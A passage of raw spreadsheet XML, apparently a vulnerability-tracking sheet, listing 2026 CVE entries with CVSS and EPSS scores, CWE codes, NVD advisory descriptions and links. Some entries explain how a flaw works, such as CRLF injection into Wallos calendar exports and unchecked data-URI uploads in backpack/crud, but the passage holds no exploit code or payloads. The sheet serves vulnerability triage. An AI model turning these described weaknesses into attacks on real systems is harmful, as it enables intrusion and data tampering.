t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2228" s="5" t="inlineStr" /><c r="H2228" s="5" t="n"><v>0.003</v></c><c r="I2228" s="5" t="inlineStr" /><c r="J2228" s="5" t="inlineStr" /><c r="K2228" s="5" t="inlineStr" /><c r="L2228" s="5" t="inlineStr" /><c r="M2228" s="5" t="inlineStr" /><c r="N2228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2228" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2228" s="5" t="inlineStr" /><c r="Q2228" s="5" t="inlineStr"><is><t>CWE-772</t></is></c><c r="R2228" s="5" t="inlineStr"><is><t>Missing release of resource after effective lifetime in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to deny service locally.</t></is></c><c r="S2228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72931</t></is></c></row><row r="2229"><c r="A2229" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2229" s="5" t="inlineStr"><is><t>CVE-2026-69381</t></is></c><c r="D2229" s="5" t="n"><v>4.6</v></c><c r="E2229" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2229" s="5" t="inlineStr" /><c r="H2229" s="5" t="n"><v>0.004</v></c><c r="I2229" s="5" t="inlineStr" /><c r="J2229" s="5" t="inlineStr" /><c r="K2229" s="5" t="inlineStr" /><c r="L2229" s="5" t="inlineStr" /><c r="M2229" s="5" t="inlineStr" /><c r="N2229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2229" s="5" t="inlineStr" /><c r="Q2229" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2229" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Storage Port Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="S2229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69381</t></is></c></row><row r="2230"><c r="A2230" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2230" s="5" t="inlineStr"><is><t>CVE-2026-69548</t></is></c><c r="D2230" s="5" t="n"><v>4.6</v></c><c r="E2230" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2230" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2230" s="5" t="inlineStr" /><c r="H2230" s="5" t="n"><v>0.005</v></c><c r="I2230" s="5" t="inlineStr" /><c r="J2230" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2230"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30" s="5" t="inlineStr" /><c r="M2230" s="5" t="inlineStr" /><c r="N2230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2230" s="5" t="inlineStr" /><c r="Q2230" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R2230" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="S2230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t></is></c></row><row r="2231"><c r="A2231" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2231" s="5" t="inlineStr"><is><t>CVE-2026-76959</t></is></c><c r="D2231" s="5" t="n"><v>4.6</v></c><c r="E2231" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2231" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G2231" s="5" t="inlineStr" /><c r="H2231" s="5" t="n"><v>0.001</v></c><c r="I2231" s="5" t="inlineStr" /><c r="J2231" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K2231" s="5" t="inlineStr" /><c r="L2231" s="5" t="inlineStr" /><c r="M2231" s="5" t="inlineStr" /><c r="N2231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2231" s="5" t="inlineStr" /><c r="Q2231" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R2231"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S2231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76959</t></is></c></row><row r="2232"><c r="A2232" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2232" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2232" s="5" t="inlineStr"><is><t>CVE-2026-77353</t></is></c><c r="D2232" s="5" t="n"><v>4.6</v></c><c r="E2232" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2232" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2232" s="5" t="inlineStr" /><c r="H2232" s="5" t="n"><v>0.002</v></c><c r="I2232" s="5" t="inlineStr" /><c r="J2232" s="5" t="inlineStr" /><c r="K2232" s="5" t="inlineStr" /><c r="L2232" s="5" t="inlineStr" /><c r="M2232" s="5" t="inlineStr" /><c r="N2232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2232" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2232" s="5" t="inlineStr" /><c r="Q2232" s="5" t="inlineStr"><is><t>CWE-116, CWE-74</t></is></c><c r="R2232" s="5" t="inlineStr"><is><t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 5.0.0, Wallos allows authenticated users to inject arbitrary iCalendar properties and events into their exported .ics feed by embedding raw CRLF sequences in subscription names or notes. Because the input validation layer only encodes HTML metacharacters but never strips newlines, and the export layer decodes those entities back before writing iCal output, an attacker with any valid account can craft a subscription whose name breaks out of the current VEVENT block and inserts fully attacker-controlled calendar events — including spoofed organizers, arbitrary email addresses in ATTENDEE properties, and misleading event content — into any calendar application subscribed to that feed. This issue has been patched in version 5.0.0.</t></is></c><c r="S2232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77353</t></is></c></row><row r="2233"><c r="A2233" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2233" s="5" t="inlineStr"><is><t>CVE-2026-78452</t></is></c><c r="D2233" s="5" t="n"><v>4.6</v></c><c r="E2233" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2233" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2233" s="5" t="inlineStr" /><c r="H2233" s="5" t="n"><v>0.005</v></c><c r="I2233" s="5" t="inlineStr" /><c r="J2233" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2233" s="5" t="inlineStr"><is><t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L2233" s="5" t="inlineStr" /><c r="M2233" s="5" t="inlineStr" /><c r="N2233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2233" s="5" t="inlineStr" /><c r="Q2233" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2233" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="S2233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78452</t></is></c></row><row r="2234"><c r="A2234" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2234" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2234" s="5" t="inlineStr"><is><t>CVE-2026-78508</t></is></c><c r="D2234" s="5" t="n"><v>4.6</v></c><c r="E2234" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2234" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2234" s="5" t="inlineStr" /><c r="H2234" s="5" t="n"><v>0.004</v></c><c r="I2234" s="5" t="inlineStr" /><c r="J2234" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2234"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34" s="5" t="inlineStr" /><c r="M2234" s="5" t="inlineStr" /><c r="N2234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2234" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2234" s="5" t="inlineStr" /><c r="Q2234" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2234" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="S2234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t></is></c></row><row r="2235"><c r="A2235" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2235" s="5" t="inlineStr"><is><t>CVE-2026-78971</t></is></c><c r="D2235" s="5" t="n"><v>4.6</v></c><c r="E2235" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2235" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2235" s="5" t="inlineStr" /><c r="H2235" s="5" t="n"><v>0.002</v></c><c r="I2235" s="5" t="inlineStr" /><c r="J2235" s="5" t="inlineStr" /><c r="K2235" s="5" t="inlineStr" /><c r="L2235" s="5" t="inlineStr" /><c r="M2235" s="5" t="inlineStr" /><c r="N2235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2235" s="5" t="inlineStr" /><c r="Q2235" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R2235" s="5" t="inlineStr"><is><t>In Halo &lt;= 2.25.4, the plugin management feature allows users to install/update malicious plugins, which could let attackers execute any command with Halo process permissions.</t></is></c><c r="S2235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78971</t></is></c></row><row r="2236"><c r="A2236" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2236" s="5" t="inlineStr"><is><t>CVE-2026-0001</t></is></c><c r="D2236" s="5" t="n"><v>4.4</v></c><c r="E2236" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2236" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2236" s="5" t="inlineStr" /><c r="H2236" s="5" t="n"><v>0.002</v></c><c r="I2236" s="5" t="inlineStr" /><c r="J2236" s="5" t="inlineStr" /><c r="K2236" s="5" t="inlineStr" /><c r="L2236" s="5" t="inlineStr" /><c r="M2236" s="5" t="inlineStr" /><c r="N2236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2236" s="5" t="inlineStr" /><c r="Q2236" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R2236"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S2236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0001</t></is></c></row><row r="2237"><c r="A2237" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2237" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2237" s="5" t="inlineStr"><is><t>CVE-2026-18073</t></is></c><c r="D2237" s="5" t="n"><v>4.4</v></c><c r="E2237" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2237" s="5" t="inlineStr" /><c r="H2237" s="5" t="n"><v>0.001</v></c><c r="I2237" s="5" t="inlineStr" /><c r="J2237" s="5" t="inlineStr" /><c r="K2237" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L2237" s="5" t="inlineStr" /><c r="M2237" s="5" t="inlineStr" /><c r="N2237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2237" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2237" s="5" t="inlineStr" /><c r="Q2237" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R2237" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local authenticated attacker to inject parameters into a CL command due to improper neutralization of special elements.</t></is></c><c r="S2237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18073</t></is></c></row><row r="2238"><c r="A2238" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2238" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2238" s="5" t="inlineStr"><is><t>CVE-2026-49509</t></is></c><c r="D2238" s="5" t="n"><v>4.4</v></c><c r="E2238" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2238" s="5" t="inlineStr"><is><t>PSIRT@samsung.com</t></is></c><c r="G2238" s="5" t="inlineStr" /><c r="H2238" s="5" t="n"><v>0.001</v></c><c r="I2238" s="5" t="inlineStr" /><c r="J2238" s="5" t="inlineStr" /><c r="K2238" s="5" t="inlineStr" /><c r="L2238" s="5" t="inlineStr" /><c r="M2238" s="5" t="inlineStr" /><c r="N2238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2238" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2238" s="5" t="inlineStr" /><c r="Q2238" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2238" s="5" t="inlineStr"><is><t>Out-of-bounds read vulnerability in Samsung Opensource rLottie allows Overread Buffers.

This issue affects rLottie: 25648aef19187b3f87f4d9420b8d761453ad4630.</t></is></c><c r="S2238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49509</t></is></c></row><row r="2239"><c r="A2239" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2239" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2239" s="5" t="inlineStr"><is><t>CVE-2026-54179</t></is></c><c r="D2239" s="5" t="n"><v>4.4</v></c><c r="E2239" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2239" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2239" s="5" t="inlineStr" /><c r="H2239" s="5" t="n"><v>0.002</v></c><c r="I2239" s="5" t="inlineStr" /><c r="J2239" s="5" t="inlineStr" /><c r="K2239" s="5" t="inlineStr" /><c r="L2239" s="5" t="inlineStr" /><c r="M2239" s="5" t="inlineStr" /><c r="N2239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2239" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2239" s="5" t="inlineStr" /><c r="Q2239" s="5" t="inlineStr"><is><t>CWE-434, CWE-79</t></is></c><c r="R2239" s="5" t="inlineStr"><is><t>backpack/crud provides Create, Read, Update &amp; Delete (CRUD) functions for Backpack, a collection of Laravel packages that help users build custom administration panels. From 6.0.0 until 6.8.14 and 7.0.37, the src/app/Library/Uploaders/SingleBase64Image.php methods SingleBase64Image::uploadFiles and SingleBase64Image::uploadRepeatableFiles, used by image fields through withFiles(), accept any data URI beginning with data:image without validating the declared MIME subtype or decoded bytes, while src/app/Library/Uploaders/Support/FileNameGenerator.php method FileNameGenerator::getExtensionFromFile applies mime_content_type() to the data URI instead of the decoded content. An authenticated administrator can therefore store arbitrary file content under an extensionless filename on the configured disk, which can cause stored cross-site scripting or other unintended behavior when the file is served and accessed. This issue is fixed in version 7.0.38 and 6.8.14.</t></is></c><c r="S2239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54179</t></is></c></row><row r="2240"><c r="A2240" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2240" s="5" t="inlineStr"><is><t>CVE-2026-69713</t></is></c><c r="D2240" s="5" t="n"><v>4.4</v></c><c r="E2240" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2240" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2240" s="5" t="inlineStr" /><c r="H2240" s="5" t="n"><v>0.003</v></c><c r="I2240" s="5" t="inlineStr" /><c r="J2240" s="5" t="inlineStr" /><c r="K2240" s="5" t="inlineStr" /><c r="L2240" s="5" t="inlineStr" /><c r="M2240" s="5" t="inlineStr" /><c r="N2240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2240" s="5" t="inlineStr" /><c r="Q2240" s="5" t="inlineStr" /><c r="R2240" s="5" t="inlineStr"><is><t>Dependency on vulnerable third-party component in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="S2240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69713</t></is></c></row><row r="2241"><c r="A2241" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2241" s="5" t="inlineStr"><is><t>CVE-2026-72980</t></is></c><c r="D2241" s="5" t="n"><v>4.4</v></c><c r="E2241" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2241" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2241" s="5" t="inlineStr" /><c r="H2241" s="5" t="n"><v>0.003</v></c><c r="I2241" s="5" t="inlineStr" /><c r="J2241" s="5" t="inlineStr" /><c r="K2241" s="5" t="inlineStr" /><c r="L2241" s="5" t="inlineStr" /><c r="M2241" s="5" t="inlineStr" /><c r="N2241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2241" s="5" t="inlineStr" /><c r="Q2241" s="5" t="inlineStr"><is><t>CWE-427</t></is></c><c r="R2241" s="5" t="inlineStr"><is><t>Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="S2241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72980</t></is></c></row><row r="2242"><c r="A2242" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2242" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2242" s="5" t="inlineStr"><is><t>CVE-2026-13159</t></is></c><c r="D2242" s="5" t="n"><v>4.3</v></c><c r="E2242" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2242" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2242" s="5" t="inlineStr" /><c r="H2242" s="5" t="n"><v>0.001</v></c><c r="I2242" s="5" t="inlineStr" /><c r="J2242" s="5" t="inlineStr" /><c r="K2242" s="5" t="inlineStr" /><c r="L2242" s="5" t="inlineStr" /><c r="M2242" s="5" t="inlineStr" /><c r="N2242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2242" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2242" s="5" t="inlineStr" /><c r="Q2242" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2242" s="5" t="inlineStr"><is><t>The Real Estate Papi WordPress theme through 1.0.5 does not perform capability or CSRF checks on one of its AJAX actions, allowing any authenticated user, such as a subscriber, to install a fixed set of companion  from the WordPress.org repository. Where the request runs in the session of a user who can activate , those  are activated as well.</t></is></c><c r="S2242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-13159</t></is></c></row><row r="2243"><c r="A2243" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2243" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2243" s="5" t="inlineStr"><is><t>CVE-2026-14466</t></is></c><c r="D2243" s="5" t="n"><v>4.3</v></c><c r="E2243" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2243" s="5" t="inlineStr"><is><t>cert@airbus.com</t></is></c><c r="G2243" s="5" t="inlineStr" /><c r="H2243" s="5" t="n"><v>0.002</v></c><c r="I2243" s="5" t="inlineStr" /><c r="J2243" s="5" t="inlineStr" /><c r="K2243" s="5" t="inlineStr" /><c r="L2243" s="5" t="inlineStr" /><c r="M2243" s="5" t="inlineStr" /><c r="N2243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2243" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2243" s="5" t="inlineStr" /><c r="Q2243" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2243" s="5" t="inlineStr"><is><t>It’s possible to run a stored XSS in Stormshield’s web administration panel.



To exploit this vulnerability, a SNS administrator with appropriate permissions must inject  some malicious script in a group’s comments in the webservices administration interface.</t></is></c><c r="S2243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-14466</t></is></c></row><row r="2244"><c r="A2244" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2244" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2244" s="5" t="inlineStr"><is><t>CVE-2026-15550</t></is></c><c r="D2244" s="5" t="n"><v>4.3</v></c><c r="E2244" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2244" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G2244" s="5" t="inlineStr" /><c r="H2244" s="5" t="n"><v>0.002</v></c><c r="I2244" s="5" t="inlineStr" /><c r="J2244" s="5" t="inlineStr" /><c r="K2244" s="5" t="inlineStr" /><c r="L2244" s="5" t="inlineStr" /><c r="M2244" s="5" t="inlineStr" /><c r="N2244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2244" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2244" s="5" t="inlineStr" /><c r="Q2244" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2244" s="5" t="inlineStr"><is><t>The Ninja Forms - Save Progress plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 3.0.30. This is due to the lack of capability checks and nonce verification in the 'bulk_actions' function. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary database records from the 'wp_nf3_objects' table, such as saved submissions.</t></is></c><c r="S2244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15550</t></is></c></row><row r="2245"><c r="A2245" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2245" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2245" s="5" t="inlineStr"><is><t>CVE-2026-18313</t></is></c><c r="D2245" s="5" t="n"><v>4.3</v></c><c r="E2245" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2245" s="5" t="inlineStr"><is><t>security@tcpdump.org</t></is></c><c r="G2245" s="5" t="inlineStr" /><c r="H2245" s="5" t="n"><v>0.002</v></c><c r="I2245" s="5" t="inlineStr" /><c r="J2245" s="5" t="inlineStr" /><c r="K2245" s="5" t="inlineStr" /><c r="L2245" s="5" t="inlineStr" /><c r="M2245" s="5" t="inlineStr" /><c r="N2245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2245" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2245" s="5" t="inlineStr" /><c r="Q2245" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="R2245" s="5" t="inlineStr"><is><t>rpcapd can allocate up to 65536 bytes per each RPCAP_MSG_UPDATEFILTER_REQ or RPCAP_MSG_STARTCAP_REQ message received from the client, but it never frees the memory, so it leaks memory even under normal use.  A malicious client can cause the server to leak memory substantially faster.</t></is></c><c r="S2245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18313</t></is></c></row><row r="2246"><c r="A2246" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2246" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2246" s="5" t="inlineStr"><is><t>CVE-2026-19043</t></is></c><c r="D2246" s="5" t="n"><v>4.3</v></c><c r="E2246" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2246" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G2246" s="5" t="inlineStr" /><c r="H2246" s="5" t="n"><v>0.002</v></c><c r="I2246" s="5" t="inlineStr" /><c r="J2246" s="5" t="inlineStr" /><c r="K2246" s="5" t="inlineStr" /><c r="L2246" s="5" t="inlineStr" /><c r="M2246" s="5" t="inlineStr" /><c r="N2246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2246" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2246" s="5" t="inlineStr" /><c r="Q2246" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2246" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Menulux Software Inc. Menulux Portal allows Accessing Functionality Not Properly Constrained by ACLs.

This issue affects Menulux Portal: before 20260903211448.</t></is></c><c r="S2246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19043</t></is></c></row><row r="2247"><c r="A2247" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2247" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2247" s="5" t="inlineStr"><is><t>CVE-2026-19081</t></is></c><c r="D2247" s="5" t="n"><v>4.3</v></c><c r="E2247" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2247" s="5" t="inlineStr"><is><t>iletisim@usom.gov.tr</t></is></c><c r="G2247" s="5" t="inlineStr" /><c r="H2247" s="5" t="n"><v>0.002</v></c><c r="I2247" s="5" t="inlineStr" /><c r="J2247" s="5" t="inlineStr" /><c r="K2247" s="5" t="inlineStr" /><c r="L2247" s="5" t="inlineStr" /><c r="M2247" s="5" t="inlineStr" /><c r="N2247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2247" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2247" s="5" t="inlineStr" /><c r="Q2247" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2247" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Gastromenum Gastromenum Ticket and QR Menu System allows Accessing Functionality Not Properly Constrained by ACLs.

This issue affects Gastromenum Ticket and QR Menu System: before 2026.08.31.</t></is></c><c r="S2247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19081</t></is></c></row><row r="2248"><c r="A2248" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2248" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2248" s="5" t="inlineStr"><is><t>CVE-2026-28627</t></is></c><c r="D2248" s="5" t="n"><v>4.3</v></c><c r="E2248" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2248" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2248" s="5" t="inlineStr" /><c r="H2248" s="5" t="n"><v>0.002</v></c><c r="I2248" s="5" t="inlineStr" /><c r="J2248" s="5" t="inlineStr" /><c r="K2248" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L2248" s="5" t="inlineStr" /><c r="M2248" s="5" t="inlineStr" /><c r="N2248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2248" s="5" t="inlineStr" /><c r="Q2248" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="R2248" s="5" t="inlineStr"><is><t>In btm_sec_encrypt_change of btm_sec.cc, there is a possible downgrade attack due to a logic error in the code. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="S2248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28627</t></is></c></row><row r="2249"><c r="A2249" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2249" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2249" s="5" t="inlineStr"><is><t>CVE-2026-45527</t></is></c><c r="D2249" s="5" t="n"><v>4.3</v></c><c r="E2249" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2249" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2249" s="5" t="inlineStr" /><c r="H2249" s="5" t="n"><v>0.003</v></c><c r="I2249" s="5" t="inlineStr" /><c r="J2249" s="5" t="inlineStr" /><c r="K2249" s="5" t="inlineStr" /><c r="L2249" s="5" t="inlineStr" /><c r="M2249" s="5" t="inlineStr" /><c r="N2249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2249" s="5" t="inlineStr" /><c r="Q2249" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R2249" s="5" t="inlineStr"><is><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is></c><c r="S2249" s="6" 